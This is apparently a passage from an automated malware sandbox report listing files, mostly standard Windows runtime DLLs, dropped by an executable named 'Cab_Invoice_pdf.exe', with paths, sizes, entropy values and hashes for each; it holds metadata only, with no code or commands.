                          SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                          MD5:6DB54065B33861967B491DD1C8FD8595
                          SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                          SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                          SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-heap-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.174986589968396
                          Encrypted:false
                          SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                          MD5:2EA3901D7B50BF6071EC8732371B821C
                          SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                          SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                          SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-interlocked-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17856
                          Entropy (8bit):7.076803035880586
                          Encrypted:false
                          SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                          MD5:D97A1CB141C6806F0101A5ED2673A63D
                          SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                          SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                          SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-libraryloader-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.131154779640255
                          Encrypted:false
                          SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                          MD5:D0873E21721D04E20B6FFB038ACCF2F1
                          SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                          SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                          SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-localization-l1-2-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20792
                          Entropy (8bit):7.089032314841867
                          Encrypted:false
                          SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                          MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                          SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                          SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                          SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-memory-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.101895292899441
                          Encrypted:false
                          SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                          MD5:D500D9E24F33933956DF0E26F087FD91
                          SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                          SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                          SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-namedpipe-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.16337963516533
                          Encrypted:false
                          SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                          MD5:6F6796D1278670CCE6E2D85199623E27
                          SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                          SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                          SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processenvironment-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19248
                          Entropy (8bit):7.073730829887072
                          Encrypted:false
                          SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                          MD5:5F73A814936C8E7E4A2DFD68876143C8
                          SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                          SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                          SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processthreads-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19392
                          Entropy (8bit):7.082421046253008
                          Encrypted:false
                          SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                          MD5:A2D7D7711F9C0E3E065B2929FF342666
                          SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                          SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                          SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processthreads-l1-1-1.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.1156948849491055
                          Encrypted:false
                          SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                          MD5:D0289835D97D103BAD0DD7B9637538A1
                          SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                          SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                          SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-profile-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17712
                          Entropy (8bit):7.187691342157284
                          Encrypted:false
                          SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                          MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                          SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                          SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                          SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-rtlsupport-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17720
                          Entropy (8bit):7.19694878324007
                          Encrypted:false
                          SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                          MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                          SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                          SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                          SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-string-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.137724132900032
                          Encrypted:false
                          SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                          MD5:12CC7D8017023EF04EBDD28EF9558305
                          SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                          SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                          SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-synch-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20280
                          Entropy (8bit):7.04640581473745
                          Encrypted:false
                          SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                          MD5:71AF7ED2A72267AAAD8564524903CFF6
                          SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                          SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                          SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-synch-l1-2-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.138910839042951
                          Encrypted:false
                          SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                          MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                          SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                          SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                          SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-sysinfo-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19248
                          Entropy (8bit):7.072555805949365
                          Encrypted:false
                          SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                          MD5:19A40AF040BD7ADD901AA967600259D9
                          SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                          SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                          SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-timezone-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18224
                          Entropy (8bit):7.17450177544266
                          Encrypted:false
                          SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                          MD5:BABF80608FD68A09656871EC8597296C
                          SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                          SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                          SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-util-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1007227686954275
                          Encrypted:false
                          SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                          MD5:0F079489ABD2B16751CEB7447512A70D
                          SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                          SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                          SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-conio-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.088693688879585
                          Encrypted:false
                          SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                          MD5:6EA692F862BDEB446E649E4B2893E36F
                          SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                          SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                          SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-convert-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22328
                          Entropy (8bit):6.929204936143068
                          Encrypted:false
                          SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                          MD5:72E28C902CD947F9A3425B19AC5A64BD
                          SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                          SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                          SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-environment-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18736
                          Entropy (8bit):7.078409479204304
                          Encrypted:false
                          SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                          MD5:AC290DAD7CB4CA2D93516580452EDA1C
                          SHA1:FA949453557D0049D723F9615E4F390010520EDA
                          SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                          SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-filesystem-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20280
                          Entropy (8bit):7.085387497246545
                          Encrypted:false
                          SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                          MD5:AEC2268601470050E62CB8066DD41A59
                          SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                          SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                          SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-heap-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.060393359865728
                          Encrypted:false
                          SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                          MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                          SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                          SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                          SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-locale-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.13172731865352
                          Encrypted:false
                          SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                          MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                          SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                          SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                          SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-math-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):28984
                          Entropy (8bit):6.6686462438397
                          Encrypted:false
                          SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                          MD5:8B0BA750E7B15300482CE6C961A932F0
                          SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                          SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                          SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-process-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.076072254895036
                          Encrypted:false
                          SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                          MD5:8D02DD4C29BD490E672D271700511371
                          SHA1:F3035A756E2E963764912C6B432E74615AE07011
                          SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                          SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-runtime-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22840
                          Entropy (8bit):6.942029615075195
                          Encrypted:false
                          SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                          MD5:41A348F9BEDC8681FB30FA78E45EDB24
                          SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                          SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                          SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-stdio-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):24368
                          Entropy (8bit):6.873960147000383
                          Encrypted:false
                          SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                          MD5:FEFB98394CB9EF4368DA798DEAB00E21
                          SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                          SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                          SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-string-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):23488
                          Entropy (8bit):6.840671293766487
                          Encrypted:false
                          SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                          MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                          SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                          SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                          SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-time-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20792
                          Entropy (8bit):7.018061005886957
                          Encrypted:false
                          SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                          MD5:849F2C3EBF1FCBA33D16153692D5810F
                          SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                          SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                          SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-utility-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.127951145819804
                          Encrypted:false
                          SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                          MD5:B52A0CA52C9C207874639B62B6082242
                          SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                          SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                          SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:Zip archive data, at least v2.0 to extract
                          Category:dropped
                          Size (bytes):788326
                          Entropy (8bit):5.450096772437984
                          Encrypted:false
                          SSDEEP:12288:hE7Qf7ul3vNuOn9/eV8h9+fsEaD1VykmrMbbcor:i7Qf7AvT/eV8h9+fsEaxdbbdr
                          MD5:8EB57166E2699F02C4BC8BE1383F283D
                          SHA1:1B89862749423F4A683B4DA2ADE4610CCD715E92
